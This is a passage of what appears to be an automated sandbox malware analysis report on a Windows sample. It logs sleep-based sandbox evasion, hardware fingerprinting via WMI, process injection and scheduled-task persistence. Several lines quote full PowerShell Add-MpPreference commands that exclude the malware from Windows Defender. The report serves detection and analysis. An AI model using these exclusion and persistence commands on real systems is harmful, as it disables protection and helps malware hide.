                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7628Thread sleep count: 2784 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -99891s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -99776s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -99671s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -99548s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -99437s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7628Thread sleep count: 1041 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -99296s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -99172s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -99059s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -98938s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -98813s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -98704s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -98594s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -98454s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -98329s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -98219s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -98107s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -97999s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -97774s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -97469s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -97279s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 7740Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8044Thread sleep count: 1143 > 30
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8044Thread sleep count: 2365 > 30
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -99890s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -99781s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -99671s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -99562s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -99453s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -99342s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -99226s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -99119s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -98843s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -98634s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -98499s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -98336s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -98233s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -98109s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -97999s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99891Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99776Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99671Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99548Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99437Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99296Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99172Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99059Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98938Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98813Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98704Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98594Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98454Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98329Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98219Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98107Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 97999Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 97774Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 97469Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 97279Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 100000
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99890
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99781
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99671
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99562
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99453
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99342
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99226
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99119
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98843
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98634
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98499
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98336
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98233
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98109
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 97999
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 922337203685477
                        Source: LisectAVT_2403002A_16.exe, 00000009.00000002.2899755875.00000000011EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
                        Source: NxmtwwVGOtEdjd.exe, 0000000F.00000002.2900321221.000000000100C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Win6
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"Jump to behavior
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory written: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeMemory written: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp"Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
